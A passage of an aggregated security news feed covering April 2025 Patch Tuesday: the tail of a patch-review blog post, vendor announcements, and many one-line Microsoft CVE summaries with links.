System Center product. You can find the links in the bulletin. In addition to the one SFB already discussed, there are eight additional patches for security feature bypasses. Mostly, you can tell what’s being bypassed in the title. The BitLocker bugs bypass Bitlocker. The Hello bug bypasses Hello. The bug in Mark of the Web (MotW) bypasses MotW defenses. The bug in Security Zone Mapping allows content to be treated as if it were in a different zone. The bug in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally. The bugs in OneNote and Word allow for the opening of files that should otherwise be blocked. Again, Mac users will have to wait for their patches. Finally, the bug in Defender would allow applications to run that would otherwise be blocked. Looking at the information disclosure bugs in the April release, a few of these merely result in info leaks consisting of unspecified memory contents. There are also some that lead to the disclosure of the ever-nebulous “sensitive information.” The bugs in Azure Local Cluster could allow the disclosure of device information such as a token, credentials, resource IDs, SAS tokens, user properties, and other sensitive information. The bug in Dynamics Business Central could allow an attacker to recover cleartext passwords from memory. The bug in NTFS allows an authenticated attacker to disclose file path information under a folder where the attacker doesn't have permission to list content. That is also the case for the bug in ReFS. The vulnerability in Admin Center in Azure could allow unauthorized read-only access to the local file system. The final info disclosure bug for April resides in Outlook for Android. If exploited, it could allow an attacker to read targeted e-mails.Moving on to the 14 Denial-of-Service (DoS) bugs getting patches this month, many simply state that an attacker could deny service over a network to that component. Again, there’s no indication if that’s temporary or a permanent DoS. Does the system blue screen? Is a reboot needed? Does the service recover if the attack stops? I suppose we’ll never know.Finally, there are three spoofing bugs receiving patches this month, and two of these are rated Low in severity. The bugs in Edge for iOS can be used to trick users into clicking something they thought was safe. One also requires that multiple instances of the browser be opened, which sounds unlikely. The Important-rate bug in Windows Hello just states unauthorized attackers could perform spoofing locally, but Microsoft provides no details on what sort of spoofing.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on May 13. I’ll be in Germany setting up for Pwn2Own Berlin, but I’ll return with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

https://www.thezdi.com/blog/2025/4/8/the-april-2025-security-update-review
Found means fixed: Reduce security debt at scale with GitHub security campaigns
2025-04-08T16:00:16Z | 1744128016

Starting today, security campaigns are generally available for all GitHub Advanced Security and GitHub Code Security customers—helping organizations take control of their security debt and manage risk by unlocking collaboration between developers and security teams. The post Found means fixed: Reduce security debt at scale with GitHub security campaigns appeared first on The GitHub Blog.

https://github.blog/security/application-security/found-means-fixed-reduce-security-debt-at-scale-with-github-security-campaigns/
What Happened Before the Breach?
2025-04-08T14:29:30Z | 1744122570

A major retailer has just suffered a massive data breach. Customer credit card information is circulating on the dark web, fraudulent transactions are skyrocketing, and consumer trust is rapidly eroding. The attack was stealthy, persistent, and devastating. But how did it happen? To fully understand, we must retrace...

https://www.netscout.com/blog/what-happened-breach-7
April Security Update
2025-04-08T14:07:40Z | 1744121260

Ivanti’s vulnerability management program is a central part of our commitment to security. We employ rigorous testing and validation methodologies to enable swift identification, patching, and disclosure of vulnerabilities in collaboration with the broader security ecosystem. Our priority is to provide responsible and transparent communication to our customers, so they are empowered to defend their environments. In recent months, we have intensified our internal scanning, manual exploitation and testing capabilities, and have also made enhancements to our responsible disclosure process so that we promptly discover and address potential issues, and so that our customers are best equipped to take action. Ivanti releases standard security patches on the second Tuesday of every month. For many of our customers, the predictable schedule facilitates better planning and management of IT resources, allowing them to allocate time and personnel efficiently for the timely updates. Today, Ivanti is disclosing vulnerabilities in Ivanti Endpoint Manager (EPM). It is important for customers to know: We have no evidence of any of these vulnerabilities being exploited in the wild. These vulnerabilities do not impact any other Ivanti solutions. More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisory. Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required). Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

https://www.ivanti.com/blog/april-security-update
SCC SKO 2025
2025-04-08T13:48:40Z | 1744120120

Join iboss at MN Tech 2025 February 6-7! Stop by our booth to learn more about iboss and Zero Trust. The post SCC SKO 2025 appeared first on iboss.

https://www.iboss.com/events/mn-tech-2025-2-2/
Infosecurity Europe 2025
2025-04-08T12:52:16Z | 1744116736

Join iboss at MN Tech 2025 February 6-7! Stop by our booth to learn more about iboss and Zero Trust. The post Infosecurity Europe 2025 appeared first on iboss.

https://www.iboss.com/events/mn-tech-2025-2/
Cybersecurity Act passed by Parliament, obligations under the NIS 2 Directive enter into force 8 April 2025
2025-04-08T12:45:08Z | 1744116308

The Cybersecurity Act entails new risk management and reporting obligations for many sectors. One of the first steps is registering for a list of entities.

https://traficom.fi/en/news/cybersecurity-act-passed-parliament-obligations-under-nis-2-directive-enter-force-8-april-2025
Cybersecurity Act passed by Parliament, obligations under the NIS 2 Directive enter into force 8 April 2025
2025-04-08T12:45:08Z | 1744116308

The Cybersecurity Act entails new risk management and reporting obligations for many sectors. One of the first steps is registering for a list of entities.

https://traficom.fi/en/news/cybersecurity-act-passed-parliament-obligations-under-nis-2-directive-enter-force-8-april-2025
Riasztás Ivanti termékeket érintő kritikus sérülékenységről
2025-04-08T12:05:46Z | 1744113946

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki az Ivanti Connect Secure, Ivanti Policy Secure és az Ivanti ZTA Gateways szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága és aktív kihasználása miatt. A CVE-2025-22457 egy kritikus súlyosságú biztonsági rés, amely az Ivanti Connect Secure (ICS), Ivanti Policy Secure és […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-ivanti-termekeket-erinto-kritikus-serulekenysegrol/
The human behind the login: Janelle Allen’s pursuit of better identity systems
2025-04-08T12:00:00Z | 1744113600

On Identity Management Day, we spotlight a leader transforming authentication from rigid password checks to systems that recognize the full complexity of human users.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/the-human-behind-the-login-janelle-allen-pursuit-of-better-identity-systems.html
The human behind the login: Janelle Allen’s pursuit of better identity systems
2025-04-08T12:00:00Z | 1744113600

On Identity Management Day, we spotlight a leader transforming authentication from rigid password checks to systems that recognize the full complexity of human users.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/the-human-behind-the-login-janelle-allen-pursuit-of-better-identity-systems.html
Critical Linux RCE Vulnerability in CUPS ? What We Know and How to Prepare
2025-04-08T12:00:00Z | 1744113600

https://www.akamai.com/blog/security-research/2024/sep/guidance-on-critical-cups-rce
Analyse d'un décodeur TNT
2025-04-08T09:15:39Z | 1744103739

https://www.synacktiv.com/publications/analyse-dun-decodeur-tnt.html
1 billion reasons to protect your identity online
2025-04-08T09:00:00Z | 1744102800

Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t.

https://www.welivesecurity.com/en/cybersecurity/1-billion-reasons-protect-identity-online/
CVE-2025-26682 ASP.NET Core and Visual Studio Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26682
CVE-2025-24062 Microsoft DWM Core Library Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24062
CVE-2025-24060 Microsoft DWM Core Library Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24060
CVE-2025-20570 Visual Studio Code Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Visual Studio Code allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-20570
CVE-2025-29811 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows Mobile Broadband allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29811
CVE-2025-29819 Windows Admin Center in Azure Portal Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

External control of file name or path in Azure Portal Windows Admin Center allows an unauthorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29819
CVE-2025-29816 Microsoft Word Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Microsoft Office Word allows an unauthorized attacker to bypass a security feature over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29816
CVE-2025-29812 DirectX Graphics Kernel Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Untrusted pointer dereference in Windows Kernel Memory allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29812
CVE-2025-29810 Active Directory Domain Services Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29810
CVE-2025-29805 Outlook for Android Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Exposure of sensitive information to an unauthorized actor in Outlook for Android allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29805
CVE-2025-29808 Windows Cryptographic Services Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29808
CVE-2025-29809 Windows Kerberos Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Insecure storage of sensitive information in Windows Kerberos allows an authorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29809
CVE-2025-29804 Visual Studio Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29804
CVE-2025-29801 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Incorrect default permissions in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29801
CVE-2025-29802 Visual Studio Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29802
CVE-2025-29800 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper privilege management in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29800
CVE-2025-29803 Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled search path element in Visual Studio Tools for Applications and SQL Server Management Studio allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29803
CVE-2025-27739 Windows Kernel Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27739
CVE-2025-27738 Windows Resilient File System (ReFS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Windows Resilient File System (ReFS) allows an authorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27738
CVE-2025-27737 Windows Security Zone Mapping Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows Security Zone Mapping allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27737
CVE-2025-27736 Windows Power Dependency Coordinator Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Exposure of sensitive information to an unauthorized actor in Windows Power Dependency Coordinator allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27736
CVE-2025-27735 Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Insufficient verification of data authenticity in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27735
CVE-2025-27733 NTFS Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27733
CVE-2025-27732 Windows Graphics Component Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27732
CVE-2025-27730 Windows Digital Media Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27730
CVE-2025-27731 Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in OpenSSH for Windows allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27731
CVE-2025-27728 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27728
CVE-2025-27729 Windows Shell Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Shell allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27729
CVE-2025-27727 Windows Installer Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper link resolution before file access ('link following') in Windows Installer allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27727
CVE-2025-27490 Windows Bluetooth Service Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27490
CVE-2025-27491 Windows Hyper-V Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Hyper-V allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27491
CVE-2025-27492 Windows Secure Channel Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27492
CVE-2025-27486 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27486
CVE-2025-27489 Azure Local Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Azure Local allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27489
CVE-2025-27487 Remote Desktop Client Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Remote Desktop Client allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27487
CVE-2025-27483 NTFS Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27483
CVE-2025-27482 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27482
CVE-2025-27481 Windows Telephony Service Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Stack-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27481
CVE-2025-27480 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27480
CVE-2025-27484 Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27484
CVE-2025-27485 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27485
CVE-2025-27469 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27469
CVE-2025-27467 Windows Digital Media Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27467
CVE-2025-26679 RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in RPC Endpoint Mapper Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26679
CVE-2025-26678 Windows Defender Application Control Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Windows Defender Application Control (WDAC) allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26678
CVE-2025-26676 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26676
CVE-2025-26675 Windows Subsystem for Linux Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows Subsystem for Linux allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26675
CVE-2025-26673 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26673
CVE-2025-26672 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26672
CVE-2025-26674 Windows Media Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26674
CVE-2025-26671 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26671
CVE-2025-26670 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26670
CVE-2025-26652 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26652
CVE-2025-26651 Windows Local Session Manager (LSM) Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26651
CVE-2025-26647 Windows Kerberos Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows Kerberos allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26647
CVE-2025-26649 Windows Secure Channel Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26649
CVE-2025-26648 Windows Kernel Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows Kernel allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26648
CVE-2025-26644 Windows Hello Spoofing Vulnerability
2025-04-08T07:00:00Z | 1744095600

Automated recognition mechanism with inadequate detection or handling of adversarial input perturbations in Windows Hello allows an unauthorized attacker to perform spoofing locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26644
CVE-2025-26641 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Cryptographic Services allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26641
CVE-2025-26640 Windows Digital Media Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26640
CVE-2025-26642 Microsoft Office Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26642
CVE-2025-26637 BitLocker Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26637
CVE-2025-26635 Windows Hello Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Weak authentication in Windows Hello allows an authorized attacker to bypass a security feature over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26635
CVE-2025-26639 Windows USB Print Driver Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Integer overflow or wraparound in Windows USB Print Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26639
CVE-2025-26628 Azure Local Cluster Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Insufficiently protected credentials in Azure Local Cluster allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26628
CVE-2025-25002 Azure Local Cluster Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Insertion of sensitive information into log file in Azure Local Cluster allows an authorized attacker to disclose information over an adjacent network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25002
CVE-2025-24058 Windows DWM Core Library Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24058
CVE-2025-21222 Windows Telephony Service Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21222
CVE-2025-21221 Windows Telephony Service Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21221
CVE-2025-21204 Windows Process Activation Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204
CVE-2025-21203 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21203
CVE-2025-21205 Windows Telephony Service Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21205
CVE-2025-21191 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Time-of-check time-of-use (toctou) race condition in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21191
CVE-2025-21197 Windows NTFS Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Windows NTFS allows an authorized attacker to disclose file path information under a folder where the attacker doesn't have permission to list content.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21197
CVE-2025-21174 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21174
CVE-2025-24073 Microsoft DWM Core Library Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24073
CVE-2025-24074 Microsoft DWM Core Library Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24074
CVE-2025-29824 Windows Common Log File System Driver Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29824
CVE-2025-29823 Microsoft Excel Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29823
CVE-2025-29822 Microsoft OneNote Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Incomplete list of disallowed inputs in Microsoft Office OneNote allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29822
CVE-2025-29820 Microsoft Word Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29820
CVE-2025-29821 Microsoft Dynamics Business Central Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper input validation in Dynamics Business Central allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29821
CVE-2025-29794 Microsoft SharePoint Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29794
CVE-2025-29792 Microsoft Office Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29792
CVE-2025-29793 Microsoft SharePoint Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29793
CVE-2025-29791 Microsoft Excel Remote Code Execution Vulnerability
